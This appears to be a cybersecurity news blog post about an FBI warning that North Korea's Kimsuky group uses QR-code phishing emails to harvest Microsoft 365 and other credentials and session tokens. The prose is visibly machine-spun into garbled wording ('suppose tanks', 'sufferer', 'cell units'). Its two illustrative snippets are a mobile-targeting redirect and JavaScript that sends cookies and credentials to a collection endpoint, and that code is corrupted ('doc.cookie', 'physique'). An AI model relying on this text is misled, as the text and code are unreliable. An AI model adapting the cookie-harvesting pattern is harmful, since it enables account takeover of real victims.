Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
FBI Warns of Kimsuky Actors Leverage Malicious QR Codes to Target U.S. Organizations

FBI Warns of Kimsuky Actors Leverage Malicious QR Codes to Target U.S. Organizations

Posted on January 9, 2026January 9, 2026 By CWS

North Korean state‑sponsored group Kimsuky is operating new spearphishing campaigns that abuse QR codes to compromise U.S. organizations.

The FBI warns that suppose tanks, NGOs, tutorial our bodies, and authorities‑linked entities with a North Korea focus at the moment are being lured with “Quishing” emails that conceal malicious URLs behind QR photos as a substitute of clickable hyperlinks.

The shift to QR codes helps the risk actors transfer victims off protected company endpoints and onto much less monitored cell units.

In these campaigns, Kimsuky operators spoof trusted contacts akin to international advisors, embassy workers, or fellow researchers. Emails invite targets to scan a QR code to hitch a convention, open a “safe” drive, or reply a coverage survey.

As soon as scanned, the code silently redirects the consumer by way of attacker‑managed infrastructure that fingerprints the machine after which masses a pretend login portal for companies like Microsoft 365, Google, Okta, or VPN gateways.

After reviewing current submissions, IC3 analysts recognized that the QR chains are tuned to evade regular electronic mail safety and MFA checks whereas quietly harvesting credentials and browser session tokens.

These operations typically finish with full account takeover, mailbox abuse, and lengthy‑time period entry to cloud assets throughout the sufferer community.

A more in-depth have a look at the an infection path reveals that the QR codes first resolve to redirector domains that log key attributes akin to consumer‑agent, OS kind, IP deal with, language, and display dimension.

Server‑aspect logic then decides whether or not to serve a cell‑optimized phishing web page or route the sufferer away if the profile seems to be like a scanner or sandbox. In code, a simplified determination block on the server might resemble:-

if “Android” in ua or “iPhone” in ua:
redirect(“/m365/login/cell”)
else:
redirect(“/information/article”)

As soon as the sufferer lands on the pretend web page and enters their password and one‑time code, Kimsuky scripts seize each the credentials and any session cookies linked to the login movement. A fundamental JavaScript sample could be:

const token = doc.cookie;
fetch(“/acquire”, {
technique: “POST”,
physique: JSON.stringify({ creds, token })
});

By replaying these tokens, the actors bypass MFA and create or modify entry guidelines, forwarders, and app passwords contained in the account.

From there, they ship recent QR‑based mostly lures from the compromised mailbox, making every new wave seem much more reliable and holding their foothold lively for prolonged intervals.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Actors, Codes, FBI, Kimsuky, Leverage, Malicious, Organizations, Target, U.S, Warns

Post navigation

Previous Post: ‘ZombieAgent’ Attack Let Researchers Take Over ChatGPT
Next Post: Microsoft’s New Teams New Admin Role to Manage External Collaboration Settings

Related Posts

Lumma Stealer Uses Browser Fingerprinting to Collect Data and for Stealthy C&C Server Communications Lumma Stealer Uses Browser Fingerprinting to Collect Data and for Stealthy C&C Server Communications Cyber Security News
Lumma Infostealer Malware Attacks Users to Steal Browser Cookies, Cryptocurrency Wallets and VPN/RDP Accounts Lumma Infostealer Malware Attacks Users to Steal Browser Cookies, Cryptocurrency Wallets and VPN/RDP Accounts Cyber Security News
Farmers Insurance Cyber Attack – 1.1 Million Customers Data Exposed in Salesforce Attack Farmers Insurance Cyber Attack – 1.1 Million Customers Data Exposed in Salesforce Attack Cyber Security News
GitHub Copilot and Visual Studio Vulnerabilities Allow Attacker to Bypass Security Feature GitHub Copilot and Visual Studio Vulnerabilities Allow Attacker to Bypass Security Feature Cyber Security News
Muddled Libra Actors Attacking Organizations Call Centers for Initial Infiltration Muddled Libra Actors Attacking Organizations Call Centers for Initial Infiltration Cyber Security News
Microsoft Probes Leak in Early Alert System as Chinese Hackers Exploit SharePoint Vulnerabilities Microsoft Probes Leak in Early Alert System as Chinese Hackers Exploit SharePoint Vulnerabilities Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Top Fraud Detection Tools for 2026
  • Microsoft Urges Action on Critical Windows Updates
  • Citrix NetScaler Threat: Immediate Action Required
  • Iranian Hackers Compromise FBI Director’s Email, Attack Stryker
  • Stocks in Cybersecurity Dip as Anthropic Tests Cutting-Edge AI

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Top Fraud Detection Tools for 2026
  • Microsoft Urges Action on Critical Windows Updates
  • Citrix NetScaler Threat: Immediate Action Required
  • Iranian Hackers Compromise FBI Director’s Email, Attack Stryker
  • Stocks in Cybersecurity Dip as Anthropic Tests Cutting-Edge AI

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark